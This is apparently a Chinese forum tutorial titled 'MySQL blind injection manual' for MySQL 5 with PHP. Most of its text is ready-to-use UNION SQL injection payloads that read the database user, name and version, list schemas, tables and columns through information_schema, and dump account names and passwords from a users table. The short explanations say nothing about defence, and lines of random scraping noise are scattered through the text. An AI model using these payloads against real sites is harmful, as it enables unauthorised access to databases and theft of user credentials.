mysql盲注手册

admin

教程内容:Mysql 5+php 注入
; Y9 G3 h1 x" Z% s  n2 d


" r- J: [$ ~* Q一.查看MYSQL基本信息(库名,版本,用户)
8 d# J- h4 N" N4 W0 C0 Q
. B0 ?7 R7 v! s2 ]4 `% Z  W) ~" s- tand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*

二.查数据库

and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8  from information_schema.SCHEMATA limit 1,1/*
3 O$ h/ c7 W9 u: h& }# plimit 从0开始递增，查询到3时浏览器返回错误，说明存在2个库。

三.暴表

# t& U  S/ A7 W6 |3 D9 d, aand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*

7 [: c; M2 P- w' Olimit 从0开始递增，查询到14时浏览器返回错误，说明此库存在13个表。
# q% W) }& x. l+ N% I( U
四.暴字段

+ @3 ?/ x; P8 }" a6 I8 h2 Dand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
8 A* h, M& _, g
limit 从0开始递增，查询到时浏览器返回错误，说明此表存在N-1个列。

五.暴数据
5 @5 z' ^$ B6 m
& L' _) f) \8 Vand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
! t. k& S; v0 p
# `; X! E/ o; x0 Y
这里直接暴明文的密码，大多时候我们遇到的是MD5加密之后的密文。